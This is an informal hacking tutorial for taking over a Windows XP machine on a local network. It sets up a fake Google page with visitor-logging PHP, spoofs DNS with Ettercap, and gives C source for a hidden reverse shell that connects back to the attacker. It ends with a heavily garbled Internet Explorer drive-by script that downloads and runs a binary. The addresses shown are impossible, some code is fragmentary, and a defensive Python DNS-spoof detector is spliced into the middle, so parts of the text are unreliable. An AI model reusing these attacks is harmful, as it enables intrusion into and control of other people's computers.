Getting Access to Remote Winxp Machine in Lan

8/10/2019 Getting Access to Remote Winxp Machine in Lan

---------------------------------------------------
Subject: Hacking in LAN
getting access to windows xp remote machine
Author: cross / x1machine.com
Platform: N/A
---------------------------------------------------

Paper
--------------

Here I will try to show you one of many methods how to gain access to a victim computer in a LAN. Our victim will be running Windows XP. On the other side, I will be an attacker running a Linux box. However, it is not important which system is used by the attacker; the method is universal for both Linux and Windows machines. Ok, I'll guide you step by step.

First of all we need to know our local IP address, so let's find that out.

Linux: run konsole or xterm or aterm, whatever you want, and type: ifconfig

Windows: open cmd.exe and type: ipconfig

In my case, and for this paper, my LAN will be my virtual network. Look at the picture, mostly this part:

vmnet Link encap:Ethernet HWaddr :0:0:2::
inet addr:134.1.415.1 Bcast:134.1.415.400 Mask:400.400.400.

That is my local IP address (134.1.415.1), so my victim will have an IP in the range 134.1.415.1-400. Now, let's check out where our enemy is hiding... I will use the nmap scanner for that. BTW, you can run nmap on both Linux and Windows systems. I will use G


Ok, he is running Windows XP SP4 and he is at 134.1.415.1>, so much we know. But we do not know one more thing: what web browser is he using... How to check this out? Here is the trick, but first... get yourself a proper web server and set it up on your local machine. If you are running Linux, then install the Apache web server and the PHP interpreter, configure it properly and run it.

Check if everything is working by opening http://localhost in your web browser; if you see the page, it's cool, if not, help yourself on your own. If you are using Windows, take a look at WAMP server, just search in Google. Maybe you'll say: what the hell, man, do I need this for? You'll need that in the future.

Now, when you've got a nicely running web server, open your server's configuration file (in my case httpd.conf) and search for the line:

    DirectoryIndex index.html


Change it to:

    DirectoryIndex index.php

That will do the next thing: when you open http://localhost, it will load not index.html as the main start HTML file but index.php. Ok, now the next thing. Sooner or later our victim will visit the world wide web's best search engine, google.com, and that is the part where we will find out which web browser he is using, coz he will visit our google.com. Now let's prepare a fully functional fake Google page.

Get the Google page source, create in your server's main directory the file google.html, open it with your favourite HTML / text editor and paste the source.

You need to fix a few links. Here is the fixed Google page:



<?php
// Browser-sniffing code the paper pastes into the fake Google page. Only the
// tail of the first class survived on the page, and the methods it calls
// (exone(), get_exone(), x2()) are not on the page, so the fragment does not
// run on its own.
    function x_reg() {
        $browsers = '';
        while (list($k,) = each($this->_browsers)) {
            if (!empty($browsers)) $browsers .= "|";
            $browsers .= $k;
        }
        // matches "<browser name><separator><major>[.minor]"
        $version_string = "[\/\sa-z(]*([0-9]+)([\.0-9a-z]+)?";
        $this->b_reg = "/($browsers)$version_string/i";
    }
    function b_set($k, $v) { $this->ua_if[strtolower($k)] = strtolower($v); }
}

class G_a extends Get_a {
    var $_browsers = array(
        'msie' => 'IE', 'netscape' => 'NS', 'safari' => 'SF',
        'mozilla' => 'MZ', 'opera' => 'OP', 'konqueror' => 'KQ',
    );
    function G_a($A = '', $settings = true) {
        if (is_array($settings)) { $run = true; extract($settings); }
        else { $run = $settings; }
        if (empty($A)) $A = getenv('HTTP_USER_AGENT');
        if (empty($A)) {
            // the PHP-version test is garbled on the page; assumed: $_SERVER exists from PHP 4.1 on
            $pv = explode(".", PHP_VERSION);
            $A = ($pv[0] > 4 || ($pv[0] == 4 && $pv[1] >= 1))
                ? $_SERVER['HTTP_USER_AGENT'] : $HTTP_SERVER_VARS['HTTP_USER_AGENT'];
        }
        if (empty($A)) return false;
        $this->b_set('ua', $A);
        if ($run) $this->x2();
    }
}

// the name of the request array is garbled on the page; GET assumed
$_VARS = isset($_GET) ? $_GET : $HTTP_GET_VARS;
if (!isset($_VARS['A'])) $_VARS['A'] = '';
$sn_set = array();
$client = new G_a($_VARS['A'], $sn_set);
$shit  = $client->get_exone('ua');   // user-agent string
$shit1 = $client->exone('xname');    // browser name
$shit2 = $client->exone('ip');       // client IP (the variable's suffix is lost on the page)
$biatch = $shit . " On " . $shit1 . " On " . $shit2;
$my_file = fopen("browser.txt", "w");  // the record ends up in browser.txt
fwrite($my_file, $biatch);
fclose($my_file);
?>

-------------------- fake google page add ends here ---------------------------

Add that code before the line:

That code will grab the victim's browser information and IP and save it to the file browser.txt. Ok, so now create a file index.php and paste there the above code (the fixed Google code).

Then create an empty file browser.txt and set its permissions to 333. All files go in the main server directory. Try it out if you wish. So, what next? I dunno man, I'm such a lame haxor :D:D

Joke. Get yourself EtterCap-NG, it runs on both Linux and Windows. We are going to perform a DNS-Spoof attack...

Ok, hope you got it installed. Now, search for the file etter.dns and edit it a little. The file should be here (on Linux): /usr/local/share/ettercap/etter.dns


Just like that:

##### LOOK HERE ##########
*.google.com A 134.1.415.1
*.google.pl A 134.1.415.1
##### LOOK HERE ##########

I put my local IP here; you should type your own.

This will spoof Google DNS resolving and redirect the victim to our local web server. Got it? Good. And if you've got everything set up nicely, the victim will visit our fake Google page, triggering the PHP code to grab his browser details and write them to a text file on our machine. Everything silently... Now let's launch EtterCap.


And double click the dns_spoof plugin. This will load the plugin.

And the last: select Start -> Start sniffing

Now you can go make yourself a coffee or go to sleep, but leave your computer working. Now each time our victim opens his beloved google.com page, he in fact will open our fake Google page and his browser details will go to us...
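The etter.dns entries above make a public name resolve to a private LAN address, which is also the symptom a defender can look for. As an added example (not part of the original paper), this Python script scans resolver or sniffer log lines for that symptom and groups the hits by answer address; the log lines and the internal-suffix list are constructed assumptions.

```python
import ipaddress
import re

# Constructed sample of log lines in the form "<client> <qname> A <answer>".
# 93.184.216.34 stands in for a normal public answer; the 10.0.0.5 answers are
# what an etter.dns line like "*.google.com A <attacker LAN IP>" produces.
SAMPLE_LOG = """\
10.0.0.23 www.google.com A 93.184.216.34
10.0.0.23 www.google.com A 10.0.0.5
10.0.0.40 intranet.corp.local A 10.0.0.9
10.0.0.23 www.google.pl A 10.0.0.5
10.0.0.41 mail.example.org A 192.168.1.7
this line is not a DNS record
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+A\s+(\S+)$")

# Names the organisation hosts itself (assumed list): these may legitimately
# resolve to private addresses and are not reported.
INTERNAL_SUFFIXES = (".corp.local", ".lan")


def parse_line(line):
    """Return (client, qname, answer_ip) or None for a malformed line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    client, qname, answer = m.groups()
    try:
        return client, qname.lower().rstrip("."), ipaddress.ip_address(answer)
    except ValueError:
        return None


def find_spoofed_answers(log_text):
    """Public names answered with a private (RFC 1918 and similar) address."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        client, qname, ip = rec
        if ip.is_private and not qname.endswith(INTERNAL_SUFFIXES):
            hits.append((client, qname, str(ip)))
    return hits


def suspect_hosts(hits):
    """LAN addresses that answer for two or more different public names: the
    likely spoofing host, since etter.dns maps whole domains to one IP."""
    names_per_ip = {}
    for _client, qname, ip in hits:
        names_per_ip.setdefault(ip, set()).add(qname)
    return sorted(ip for ip, names in names_per_ip.items() if len(names) >= 2)
```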

Ok man, I'm going to have a cigarette... 3 minutes later...

What do we have here...

Holy shit

mozilla/5. (compatible; msie .; windows nt 0.1; sv1) msie

134.1.415.1>


Ok. Now we've got a complete scan. Now stop EtterCap, delete the PHP code from our fake google.com page and change the extension from index.php to index.html. Now you have to add just one line of code to our fake Google page; I'll explain what for later. Here:

between that line:

4.a and libwsock>4.a

Now let's code a simple reverse shell app...

//----------------------- Reverse.c -----------------------------
// The header names are dropped on the page; these are the ones the calls below need.
#include <winsock2.h>
#include <windows.h>
#include <stdlib.h>
#include <string.h>

int main()
{
    HWND hide;
    AllocConsole();
    hide = FindWindowA("ConsoleWindowClass", NULL);   // hide the console window
    ShowWindow(hide, 0);

    u_short pornort;
    pornort = atoi("");            // the port number string is missing on the page
    WSADATA wd;
    HANDLE h;
    SOCKET sock;
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    struct sockaddr_in sin;
    int size = sizeof(sin);
    memset(&sin, 0, sizeof(sin));
    memset(&si, 0, sizeof(si));
    WSAStartup(MAKEWORD(2, 2), &wd);

    sock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    sin.sin_family = AF_INET;
    bind(sock, (struct sockaddr *)&sin, size);
    sin.sin_port = htons(pornort);
    sin.sin_addr.s_addr = inet_addr("your_local_ip");
    connect(sock, (struct sockaddr *)&sin, size);

    // cmd.exe gets the socket as its stdin, stdout and stderr
    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESTDHANDLES;
    si.hStdInput = (void *)sock;
    si.hStdOutput = (void *)sock;
    si.hStdError = (void *)sock;
    CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, 0, NULL, &si, &pi);
    return 0;
}
//---------------------------- EOF -------------------------------------

Paste this code into your project and compile it. Name it, for example, shell.exe

Now we need to run that shit on the victim machine, how? Fuck, I dunno... Search the net.

------------------------ exploit.html for IE -----------------------------


    cl!2="cl!id+PD3" cl!1="-T" cl!="-22D0-3" cl!6="%T-0006$13" cl!full=cl!2cl!1cl!cl!6

    ?et oD?=document.createlementE"o(Sect"F oD?.!etTttri(ute "id")"oD?" oD?.!etTttri(ute "cla!!id")cl!full

    ?et o?hellTpp = oD?.reateA(SectE"?hell.Tpplication")""F ?et o$older = o?hellTpp.Uame?paceE!!f$AU#?F ?et o$olderItem=o$older.ar!eUameE"?ym(ol.ttf"F $ont_ath_omponent!=?plitEo$olderItem.ath)"O")-2)2F VinDir= $ont_ath_omponent!E0F "O" $ont_ath_omponent!E2F "O" xeUame=VinDir xeUame

    A(SUame="Micro!oft" A(Sro'="CM@B##" !et oCM@B## = reateA(SectEA(SUame "." A(Sro'F eq_type="&" "" "#" B##?e!!ion=oCM@B##.ApenEeq_#ype)Module_ath)0F oCM@B##.?endEF An rror e!ume Uext CM@Pody=oCM@B##.re!pon!ePody

    A(SUame="TDADP" A(Sro'="?tream" An rror e!ume Uext ?et o?tream=oD?.reateA(SectEA(SUame "." A(Sro')""F If rr.num(er 0 #hen

    ?et o$?A=oD?.reateA(SectE"?criptin'.$ile?y!temA(Sect")""F ?et lu'in$ile=o$?A.reate#ext$ileExeUame) #F lu'in_!i5e=@enPECM@PodyF

    $or S=2 #o lu'in_!i5e

    cPyte=MidPECM@Pody)S)2F Pyteode=T!cPEcPyteF lu'in$ile.VriteEhrEPyteodeFF Uext lu'in$ile.lo!e

    ?et oV?hell=oD?.reateA(SectE"V?cript.?hell")""F An rror e!ume Uext oV?hell.un ExeUameF)2)$T@? l!e

    o?tream.Mode=adModeeadVrite o?tream.#ype=ad#ypePinary o?tream.Apen o?tream.Vrite CM@Pody o?tream.?ave#o$ile xeUame)ad?avereateAverVrite

    o?hellTpp.?hellxecute xeUame


    nd If

    nd If nd If

    $unction &enerateUameEFandomUame=""

    rr=IntE%NndFi9=0Do ii=IntE1NndFL34 andomUame=andomUameLhrEiiF i9=i9L2@oop Vhile i9